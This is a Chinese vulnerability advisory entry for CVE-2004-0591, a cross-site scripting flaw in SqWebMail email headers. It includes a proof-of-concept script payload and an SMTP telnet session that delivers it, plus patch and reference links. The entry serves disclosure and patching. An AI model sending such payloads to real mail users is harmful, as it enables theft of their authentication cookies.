漏洞信息详情
SqWebMail Email头字段HTML注入漏洞
- CNNVD编号:CNNVD-200408-078
- 危害等级: 中危
- CVE编号:
CVE-2004-0591
- 漏洞类型:
输入验证
- 发布时间:
2004-06-21
- 威胁类型:
远程
- 更新时间:
2007-01-02
- 厂 商:
inter7 - 漏洞来源:
Luca Legato※ luca…. -
漏洞简介
SqWebMail是一款基于WEB的邮件系统。
SqWebMail不正确过滤用户提供的EMAIL头字符串,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得敏感信息。
攻击者发送的一个EMAIL消息如果在头字段包含类似如下的HTML代码:
\”<script>alert(document.location)</script>\”:
ashanti@dns:~$ telnet localhost 25
Trying x.x.x.x…
Connected to x.x.x.x.
Escape character is \’\’^]\’\’.
220 x.x.x.x ESMTP
helo foo
250 x.x.x.x
mail from:<test test com>
250 ok
rcpt to:<user mediaservice net>
250 ok
data
354 go ahead
<script>alert(document.location)</script>
.
[…]
当目标用户查看时可导致恶意脚本代码在用户浏览器上执行,泄露基于验证的COOKIE等信息。
另外攻击者也可以发送MIME Content-Type字段中设置畸形内容的\”message/delivery-status\”,也可能触发漏洞。
漏洞公告
厂商补丁:
inter7
——
目前厂商已经在4.0.5版本的软件中修复这个安全问题,请到厂商的主页下载:
http://www.inter7.com/sqwebmail/sqwebmail.html” target=”_blank”>
http://www.inter7.com/sqwebmail/sqwebmail.html
参考网址
来源: BID
名称: 10588
链接:http://www.securityfocus.com/bid/10588
来源: GENTOO
名称: GLSA-200408-02
链接:http://www.gentoo.org/security/en/glsa/glsa-200408-02.xml
来源: DEBIAN
名称: DSA-533
链接:http://www.debian.org/security/2004/dsa-533
来源: SECUNIA
名称: 11918
链接:http://secunia.com/advisories/11918/
来源: XF
名称: sqwebmail-print-header-xss(16467)
链接:http://xforce.iss.net/xforce/xfdb/16467
来源: BUGTRAQ
名称: 20040621 XSS vulnerability in Sqwebmail 4.0.4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108786212220140&w=2